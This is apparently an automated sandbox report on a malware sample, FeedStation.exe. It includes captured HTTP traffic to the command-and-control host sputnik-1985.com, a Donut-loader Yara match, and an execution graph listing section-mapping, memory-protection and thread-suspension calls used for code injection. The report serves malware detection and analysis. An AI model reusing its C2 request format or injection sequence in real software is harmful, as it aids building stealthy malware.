                                                                                                                                                                                                                          2025-01-10 10:59:20 UTC15331OUTData Raw: 2d 2d 38 43 35 57 56 4b 30 44 35 48 50 5a 48 45 35 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 45 41 33 30 45 43 41 30 34 35 38 35 37 32 34 37 37 46 39 39 43 32 34 31 44 33 43 39 32 31 0d 0a 2d 2d 38 43 35 57 56 4b 30 44 35 48 50 5a 48 45 35 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 38 43 35 57 56 4b 30 44 35 48 50 5a 48 45 35 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39
                                                                                                                                                                                                                          Data Ascii: --8C5WVK0D5HPZHE5XLContent-Disposition: form-data; name="hwid"DCEA30ECA0458572477F99C241D3C921--8C5WVK0D5HPZHE5XLContent-Disposition: form-data; name="pid"3--8C5WVK0D5HPZHE5XLContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419
                                                                                                                                                                                                                          2025-01-10 10:59:20 UTC5237OUTData Raw: af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                          Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
                                                                                                                                                                                                                          2025-01-10 10:59:20 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Fri, 10 Jan 2025 10:59:20 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=hq7r1jbkv23gfor90p8s8lf37u; expires=Tue, 06 May 2025 04:45:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mSygYH9ilQZcmG7jh6n7KYvltWNFV6deHfUN1jtGbtuHhYiOLswxF2VDE%2FoQKbOvnXpEX9SMTr97WE0cwuef8fsG3Q0TiWKkP%2F%2B8PhKG3kY%2Bk%2B9z%2FYy1bfWr5BBuolqb7auv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ffc28348ec2727b-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1957&rtt_var=739&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21529&delivery_rate=1474747&cwnd=234&unsent_bytes=0&cid=d12089b94d00b63a&ts=602&x=0"
                                                                                                                                                                                                                          2025-01-10 10:59:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                          2025-01-10 10:59:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          6192.168.2.549829104.21.112.14436416C:\Users\user\Desktop\FeedStation.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-01-10 10:59:21 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=46HK5RMUNY
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 1226
                                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                                          2025-01-10 10:59:21 UTC1226OUTData Raw: 2d 2d 34 36 48 4b 35 52 4d 55 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 45 41 33 30 45 43 41 30 34 35 38 35 37 32 34 37 37 46 39 39 43 32 34 31 44 33 43 39 32 31 0d 0a 2d 2d 34 36 48 4b 35 52 4d 55 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 36 48 4b 35 52 4d 55 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 34 36 48 4b 35 52 4d 55 4e 59 0d 0a 43
                                                                                                                                                                                                                          Data Ascii: --46HK5RMUNYContent-Disposition: form-data; name="hwid"DCEA30ECA0458572477F99C241D3C921--46HK5RMUNYContent-Disposition: form-data; name="pid"1--46HK5RMUNYContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--46HK5RMUNYC
                                                                                                                                                                                                                          2025-01-10 10:59:22 UTC1126INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Fri, 10 Jan 2025 10:59:22 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=ds4hl3e45o79njpnv7v5grbimo; expires=Tue, 06 May 2025 04:46:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BRJGJj4Zl2E36YAI9fyG%2F5n2wWuZtumm8o%2BpbqkB19SNL42ED1gRbiY%2FHPF6ATLVO0FUw6m50TkTRyadeCx7S3T3w%2FKNYWHcx5VshBOSB4N6I56mmYzoV%2BxJkoDK316TAUYg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ffc283d1e0e43b3-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1551&min_rtt=1538&rtt_var=604&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2135&delivery_rate=1771844&cwnd=203&unsent_bytes=0&cid=2a47f195d6fd1590&ts=754&x=0"
                                                                                                                                                                                                                          2025-01-10 10:59:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                          2025-01-10 10:59:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          7192.168.2.549840104.21.112.14436416C:\Users\user\Desktop\FeedStation.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-01-10 10:59:23 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=6WJTG6236WX8E
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 1101
                                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                                          2025-01-10 10:59:23 UTC1101OUTData Raw: 2d 2d 36 57 4a 54 47 36 32 33 36 57 58 38 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 43 45 41 33 30 45 43 41 30 34 35 38 35 37 32 34 37 37 46 39 39 43 32 34 31 44 33 43 39 32 31 0d 0a 2d 2d 36 57 4a 54 47 36 32 33 36 57 58 38 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 57 4a 54 47 36 32 33 36 57 58 38 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 36 57 4a 54
                                                                                                                                                                                                                          Data Ascii: --6WJTG6236WX8EContent-Disposition: form-data; name="hwid"DCEA30ECA0458572477F99C241D3C921--6WJTG6236WX8EContent-Disposition: form-data; name="pid"1--6WJTG6236WX8EContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--6WJT
                                                                                                                                                                                                                          2025-01-10 10:59:23 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Fri, 10 Jan 2025 10:59:23 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=nnmvdfj8ok2n8befsf3j58pnls; expires=Tue, 06 May 2025 04:46:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2F6Hz2M6H5UmFbNIH24djNmZ%2FWSp7SZmf229TIAVoN0msjI1tLgYgdblKi%2Bbq5dZ7%2B9Byj2lHvzT%2Bq6eGk0F7sUhI9%2FuAAYePVErVX9WaMKk2Ew7jU7L4y3buZX5mv73DdlQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ffc28469cba424b-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1543&rtt_var=591&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2013&delivery_rate=1830721&cwnd=248&unsent_bytes=0&cid=77c066cdeddd413c&ts=540&x=0"
                                                                                                                                                                                                                          2025-01-10 10:59:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                          2025-01-10 10:59:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          8192.168.2.549847104.21.112.14436416C:\Users\user\Desktop\FeedStation.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2025-01-10 10:59:24 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Content-Length: 121
                                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                                          2025-01-10 10:59:24 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 44 43 45 41 33 30 45 43 41 30 34 35 38 35 37 32 34 37 37 46 39 39 43 32 34 31 44 33 43 39 32 31
                                                                                                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=DCEA30ECA0458572477F99C241D3C921
                                                                                                                                                                                                                          2025-01-10 10:59:24 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Fri, 10 Jan 2025 10:59:24 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=kkimt1tlkgad6n173daoqe07l4; expires=Tue, 06 May 2025 04:46:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yETrDSMsPREnFoRuvR5tAdnjh46YtNNAhsmWavcgifml5OCdWWFgEF64%2BC7gTbXAeyrzL%2Bm7MiXGrRzqJTe24Z4wYJQbM%2F4J20JC6rwdy6xjQnR7EoT6H2LWz4zEjU63POA8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8ffc284d5cdec34f-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1454&min_rtt=1448&rtt_var=555&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1022&delivery_rate=1951871&cwnd=181&unsent_bytes=0&cid=8ddd4192f1d265e2&ts=511&x=0"
                                                                                                                                                                                                                          2025-01-10 10:59:24 UTC54INData Raw: 33 30 0d 0a 75 36 70 46 30 55 62 76 68 51 5a 72 38 6c 65 47 4a 74 53 5a 41 70 57 4b 76 4e 61 54 35 4b 76 53 31 61 49 65 6c 2b 4d 54 46 64 62 67 39 77 3d 3d 0d 0a
                                                                                                                                                                                                                          Data Ascii: 30u6pF0UbvhQZr8leGJtSZApWKvNaT5KvS1aIel+MTFdbg9w==
                                                                                                                                                                                                                          2025-01-10 10:59:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                          Start time:05:58:57
                                                                                                                                                                                                                          Start date:10/01/2025
                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\FeedStation.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\FeedStation.exe"
                                                                                                                                                                                                                          Imagebase:0x500000
                                                                                                                                                                                                                          File size:2'000'360 bytes
                                                                                                                                                                                                                          MD5 hash:256A1CCEC403335433630F6824E081DF
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:1.4%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                            Signature Coverage:36.7%
                                                                                                                                                                                                                            Total number of Nodes:128
                                                                                                                                                                                                                            Total number of Limit Nodes:14
                                                                                                                                                                                                                            execution_graph 14695 24e0765 14696 24e0773 14695->14696 14709 24e10b5 14696->14709 14698 24e090b GetPEB 14700 24e0988 14698->14700 14699 24e08c6 14699->14698 14708 24e0bf9 14699->14708 14712 24e0e75 14700->14712 14703 24e09e9 CreateThread 14704 24e09c1 14703->14704 14724 24e0d25 GetPEB 14703->14724 14704->14708 14720 24e1375 GetPEB 14704->14720 14707 24e0e75 4 API calls 14707->14708 14710 24e10c2 14709->14710 14722 24e10d5 GetPEB 14709->14722 14710->14699 14713 24e0e8b CreateToolhelp32Snapshot 14712->14713 14715 24e09bb 14713->14715 14716 24e0ec2 Thread32First 14713->14716 14715->14703 14715->14704 14716->14715 14717 24e0ee9 14716->14717 14717->14715 14718 24e0f20 Wow64SuspendThread 14717->14718 14719 24e0f4a CloseHandle 14717->14719 14718->14719 14719->14717 14721 24e0a43 14720->14721 14721->14707 14721->14708 14723 24e10f0 14722->14723 14723->14710 14727 24e0d7e 14724->14727 14725 24e0dde CreateThread 14725->14727 14728 24e1555 14725->14728 14726 24e0e2b 14727->14725 14727->14726 14731 252ad1a 14728->14731 14730 24e155a 14732 252e210 14731->14732 14733 252ad24 14731->14733 14734 252e234 14732->14734 14735 252e31e 14732->14735 14733->14730 14770 2530a91 14734->14770 14745 252f4ea 14735->14745 14738 252e24c 14739 2530a91 LoadLibraryA 14738->14739 14744 252e2c4 14738->14744 14740 252e28e 14739->14740 14741 2530a91 LoadLibraryA 14740->14741 14742 252e2aa 14741->14742 14743 2530a91 LoadLibraryA 14742->14743 14743->14744 14744->14730 14746 2530a91 LoadLibraryA 14745->14746 14747 252f50d 14746->14747 14748 2530a91 LoadLibraryA 14747->14748 14749 252f525 14748->14749 14750 2530a91 LoadLibraryA 14749->14750 14751 252f543 14750->14751 14752 252f56c 14751->14752 14753 252f558 VirtualAlloc 14751->14753 14752->14744 14753->14752 14755 252f586 14753->14755 14754 2530a91 LoadLibraryA 14756 252f604 14754->14756 14755->14754 14769 252f7df 14755->14769 14756->14752 14759 252f65a 14756->14759 14774 2530898 14756->14774 14757 2530a91 LoadLibraryA 14757->14759 14759->14757 14761 252f6bc 14759->14761 14759->14769 14760 252f89d VirtualFree 14760->14752 14762 252f8af RtlExitUserProcess 14760->14762 14768 252f71e 14761->14768 14761->14769 14778 252e67a 14761->14778 14762->14752 14767 252f83c 14767->14767 14768->14769 14801 252fc1a 14768->14801 14769->14760 14769->14767 14771 2530aa8 14770->14771 14772 2530acf 14771->14772 14839 252eb96 14771->14839 14772->14738 14776 25308ad 14774->14776 14775 2530923 LoadLibraryA 14777 253092d 14775->14777 14776->14775 14776->14777 14777->14756 14779 2530898 LoadLibraryA 14778->14779 14780 252e68e 14779->14780 14783 252e696 14780->14783 14825 2530936 14780->14825 14783->14769 14792 252e775 14783->14792 14784 252e6cc VirtualProtect 14784->14783 14785 252e6e0 14784->14785 14786 252e6fa VirtualProtect 14785->14786 14787 2530936 LoadLibraryA 14786->14787 14788 252e71b 14787->14788 14788->14783 14789 252e732 VirtualProtect 14788->14789 14789->14783 14790 252e742 14789->14790 14791 252e757 VirtualProtect 14790->14791 14791->14783 14793 2530898 LoadLibraryA 14792->14793 14794 252e78b 14793->14794 14795 2530936 LoadLibraryA 14794->14795 14796 252e79b 14795->14796 14797 252e7a4 VirtualProtect 14796->14797 14798 252e7d8 14796->14798 14797->14798 14799 252e7b4 14797->14799 14798->14768 14800 252e7c3 VirtualProtect 14799->14800 14800->14798 14802 252fc55 14801->14802 14803 252fc9c NtCreateSection 14802->14803 14805 252fcc1 14802->14805 14824 25302c9 14802->14824 14803->14805 14803->14824 14804 252fd56 NtMapViewOfSection 14815 252fd76 14804->14815 14805->14804 14805->14824 14806 253009f VirtualAlloc 14811 25300e1 14806->14811 14807 2530898 LoadLibraryA 14807->14815 14808 2530898 LoadLibraryA 14814 252fffd 14808->14814 14809 2530192 VirtualProtect 14812 253025d VirtualProtect 14809->14812 14819 25301b2 14809->14819 14810 253009b 14810->14806 14811->14809 14821 253017f NtMapViewOfSection 14811->14821 14811->14824 14820 253028c 14812->14820 14813 2530936 LoadLibraryA 14813->14815 14814->14806 14814->14808 14814->14810 14818 2530936 LoadLibraryA 14814->14818 14815->14807 14815->14813 14815->14814 14815->14824 14816 25303d7 14817 25303df CreateThread 14816->14817 14816->14824 14817->14824 14818->14814 14819->14812 14823 2530237 VirtualProtect 14819->14823 14820->14816 14820->14824 14835 253064b 14820->14835 14821->14809 14821->14824 14823->14819 14824->14769 14826 2530951 14825->14826 14828 252e6ae 14825->14828 14826->14828 14829 252ed3b 14826->14829 14828->14783 14828->14784 14830 252ed80 14829->14830 14833 252ed5a 14829->14833 14831 2530898 LoadLibraryA 14830->14831 14832 252ed8d 14830->14832 14831->14832 14832->14828 14833->14830 14833->14832 14834 2530936 LoadLibraryA 14833->14834 14834->14833 14838 2530673 14835->14838 14836 2530865 14836->14816 14837 2530936 LoadLibraryA 14837->14838 14838->14836 14838->14837 14840 252ebb6 14839->14840 14842 252ec9b 14839->14842 14841 252ed3b LoadLibraryA 14840->14841 14840->14842 14841->14842 14842->14771
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 0252FCB3
                                                                                                                                                                                                                            • NtMapViewOfSection.NTDLL(?,00000000), ref: 0252FD5B
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 025300CF
                                                                                                                                                                                                                            • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 02530184
                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 025301A1
                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 02530244
                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 02530277
                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 025303E8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1248616170-0
                                                                                                                                                                                                                            • Opcode ID: 34e3949558d47ac2efbd442dc042839410f73323f736e1ca0bff09bbd7760ed0
                                                                                                                                                                                                                            • Instruction ID: e05881c72dd41c0ac701657eab3f8eac9a8cb3df16af08e7411f184964262ca0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34e3949558d47ac2efbd442dc042839410f73323f736e1ca0bff09bbd7760ed0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F429A71608311AFDB25CF24C844B6BBBE9FF88714F04592DF9899B281E730E945CB95

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 187 24e0e75-24e0ebc CreateToolhelp32Snapshot 190 24e0f92-24e0f95 187->190 191 24e0ec2-24e0ee3 Thread32First 187->191 192 24e0f7e-24e0f8d 191->192 193 24e0ee9-24e0eef 191->193 192->190 194 24e0f5e-24e0f78 193->194 195 24e0ef1-24e0ef7 193->195 194->192 194->193 195->194 196 24e0ef9-24e0f18 195->196 196->194 199 24e0f1a-24e0f1e 196->199 200 24e0f36-24e0f45 199->200 201 24e0f20-24e0f34 Wow64SuspendThread 199->201 202 24e0f4a-24e0f5c CloseHandle 200->202 201->202 202->194
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,024E09BB,?,00000001,?,81EC8B55,000000FF), ref: 024E0EB3
                                                                                                                                                                                                                            • Thread32First.KERNEL32(00000000,0000001C), ref: 024E0EDF
                                                                                                                                                                                                                            • Wow64SuspendThread.KERNEL32(00000000), ref: 024E0F32
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 024E0F5C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1849706056-0
                                                                                                                                                                                                                            • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
